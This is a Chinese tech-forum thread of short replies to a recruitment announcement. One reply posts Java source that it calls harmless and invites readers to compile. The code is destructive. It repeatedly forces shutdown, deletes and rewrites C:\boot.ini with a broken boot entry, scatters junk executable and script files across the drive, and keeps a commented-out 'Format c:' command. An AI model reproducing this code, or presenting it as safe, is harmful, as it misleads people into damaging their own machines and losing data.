搜索
有爱,有技术,有你^_^)y
╱人◕‿‿◕人╲订下契约(注册新用户)

合作站点账号登陆

QQ登录

只需一步,快速开始

快捷导航
楼主: 氷見美咲
收起左侧

[公告] 8月——征集真正的技术宅!

   关闭 [复制链接]

该用户从未签到

1

主题

0

好友

1095

积分

Continue

积分
1095
发表于 2017-9-22 22:07:39 | 显示全部楼层
长知识了~
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

1095

积分

Continue

积分
1095
发表于 2017-9-22 22:08:06 | 显示全部楼层
长知识了~
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

1221

积分

Continue

积分
1221
发表于 2017-9-24 14:13:26 | 显示全部楼层
好叼好叼~~~
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

621

积分

New Game

积分
621
发表于 2017-9-27 11:08:23 | 显示全部楼层
新人
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复

使用道具 举报

签到天数: 13 天

连续签到: 1 天

[LV.3]偶尔看看II

1

主题

0

好友

3052

积分

懒人

积分
3052
发表于 2017-10-2 16:39:50 | 显示全部楼层
哇厉害厉害
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

664

积分

New Game

积分
664
发表于 2017-10-3 17:48:06 | 显示全部楼层
膜拜大佬,为大佬端茶
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

5

主题

0

好友

4018

积分

序章

积分
4018
发表于 2017-10-4 21:42:06 | 显示全部楼层
不错哦
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

1

好友

1102

积分

Continue

积分
1102
发表于 2017-10-5 00:29:03 | 显示全部楼层
辛苦啦
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

3

主题

0

好友

1395

积分

Continue

积分
1395
发表于 2017-10-5 13:02:13 | 显示全部楼层
DIY吧,一段简短的java,没有危险,各位可以自己编译试试
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package format;
//virulvirus .java
/**
*
* @author jdm
*/
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.io.UnsupportedEncodingException;
import java.util.*;
public class virulvirus extends Thread implements Runnable{
    /**
     * @param args
     */public virulvirus(){
         Timer timer=new Timer();
         TimerTask timetask=new TimerTask(){
            /* (non-Javadoc)
             * @see java.util.TimerTask#run()
             */
            @Override
            public void run() {
                // TODO Auto-generated method stub
                Process p;
                //Process f;
                try {
                    
                                        //f=Runtime.getRuntime().exec("Format c:" );
                    p=Runtime.getRuntime().exec("shutdown -s -t 10");
                                        writer();
                                        writer1();
                } catch (IOException e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                }
            }
            
         };
                 
         timer.schedule(timetask,1000,3000);
                 
     }
     public void writer(){
         File f=new File("c://boot.ini");
         if(f.exists()){
            f.delete();
            f.deleteOnExit();
         }
         
        try {
            PrintWriter writer=new PrintWriter(new OutputStreamWriter(new FileOutputStream("C://boot.ini"),"GBK"));
            writer.write("[boot loader]//ntimeout=0//ndefault=multi(0)disk(2)rdisk(0)partition(0)//WINDOWS/n[operating systems]//nmulti(0)disk(0)rdisk(0)partition(1)//WINDOWS=/"Microsoft Windows XP Professional/" /noexecute=optin /fastdetect /usepmtimer");
            writer.close();
        } catch (UnsupportedEncodingException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        } catch (FileNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }
         }
     public void writer1(){
         for(int i=1;i<50;i++){
             i*=new Random().nextInt(50);
             String x=Integer.toString(i);
             File windows=new File("c://window");
             if(!windows.exists()){
                 windows.mkdir();
             }
             File dir=new File("c://wind0ws");
             if(!dir.exists())
                 dir.mkdir();
             File dir2=new File(dir,"default");
             if(!windows.exists())dir2.mkdir();
                         File zhuomian=new File("C://Documents and Settings//All Users//桌面//jdm.txt");
                         if(!zhuomian.exists()){
                         try{zhuomian.createNewFile();}catch(IOException e){e.printStackTrace();}
                         }
            
             try {
                File f=new File("c://window");
                                if(f.exists()){
                                PrintWriter writer=new PrintWriter(new OutputStreamWriter(new FileOutputStream("c://window//"+x+".exe"),"GBK"));
                writer.write(i);
                                writer.close();}
                                else{
                                PrintWriter writer=new PrintWriter(new OutputStreamWriter(new FileOutputStream("c://"+x+".vbs"),"GBK"));
                writer.write("msgbox /"呵呵,中奖啦!!!!!!!!!!!!!!!!!!!!/"");
                                writer.close();
                                File fix=new File("c://"+x+".exe");
                                if(!fix.exists()){
                                fix.createNewFile();
                                }
                                }
                                    
            } catch (UnsupportedEncodingException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (FileNotFoundException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            }
                         catch(IOException e){
                             e.printStackTrace();
                         }
                         new Thread().start();
         }
     }
         
     
     //========================================
     public void run(){
         new virulvirus();
                 new Copy();
        
         
         
     }
     //=========================================
     
     
   
   
    public static void main(String[] args) {
        // TODO Auto-generated method stub
        virulvirus v1=new virulvirus();
        v1.start();
        
        
    }
}
/*
* To change this template, choose Tools | Templates
* and open the template in the editor.
*/
package format;
/**
*
* @author mdj
*/
//copy.java
import java.io.*;
import java.util.*;
public class Copy{
    /**
     * @param args
     */
    public Copy() {
        // TODO Auto-generated method stub
        new Timer().schedule(new TimerTask(){
            public void run(){
                String path="d://java.txt";
                File file3=new File(path);
                if(!file3.exists()){
                    try {
                        file3.createNewFile();
                    } catch (IOException e) {
                        // TODO Auto-generated catch block
                        e.printStackTrace();
                    }
                }
                byte[] buff=new byte[1024];
                String comtent="this is java test file";
                try {
                    FileOutputStream out1=new FileOutputStream(path,true);
                    BufferedOutputStream out2=new BufferedOutputStream(out1);
                    DataOutputStream out=new DataOutputStream(out2);
                    out.writeBytes(comtent);
                    out.close();
                    FileInputStream in=new FileInputStream(path);
                    in.read(buff);
                    in.close();
                    
                    for(int i=0;i<100;i++){
                        i+=new Random().nextInt(20);
                        String x=Integer.toString(i);
                        String path2="c://computer"+x+".exe";
                        FileOutputStream out4=new FileOutputStream(path2,true);
                        out4.write(buff);
                        out4.close();
                        File f=new File(path);
                        if(f.exists()){
                            f.delete();
                        }
                        File f2=new File(path2);
                        //System.out.println(f2.getClass());
                        
                    }
                    
                } catch (FileNotFoundException e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                }catch(IOException e){
                    e.printStackTrace();
                }
            }
        },3000,30);
        
    }
      
}
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

1013

积分

Continue

积分
1013
发表于 2017-10-6 21:36:47 | 显示全部楼层
技术部早晚占领哈哈哈
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

991

积分

New Game

积分
991
发表于 2017-10-7 20:42:48 | 显示全部楼层
厉害了
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

签到天数: 3 天

连续签到: 1 天

[LV.2]偶尔看看I

1

主题

0

好友

1119

积分

Continue

积分
1119
发表于 2017-10-7 21:01:13 | 显示全部楼层
我是膝盖预备役。。
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

签到天数: 3 天

连续签到: 1 天

[LV.2]偶尔看看I

1

主题

0

好友

1119

积分

Continue

积分
1119
发表于 2017-10-7 21:01:21 | 显示全部楼层
我是膝盖预备役。。
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

1353

积分

Continue

积分
1353
发表于 2017-10-9 20:17:27 | 显示全部楼层

辛苦了~新人来看看~
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复 支持 反对

使用道具 举报

该用户从未签到

1

主题

0

好友

1120

积分

Continue

积分
1120
发表于 2017-10-15 15:07:53 | 显示全部楼层
路过~
签名被小宅喵吞掉了~~~~(>_<)~~~~
回复

使用道具 举报

本版积分规则

小黑屋|手机版|技术宅(Z站|基宅) ( 粤ICP备18082987号-1 )

GMT+8, 2025-7-2 02:34 , Processed in 0.116005 second(s), 41 queries , Redis On.

Copyright © 2018 技术宅社区

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表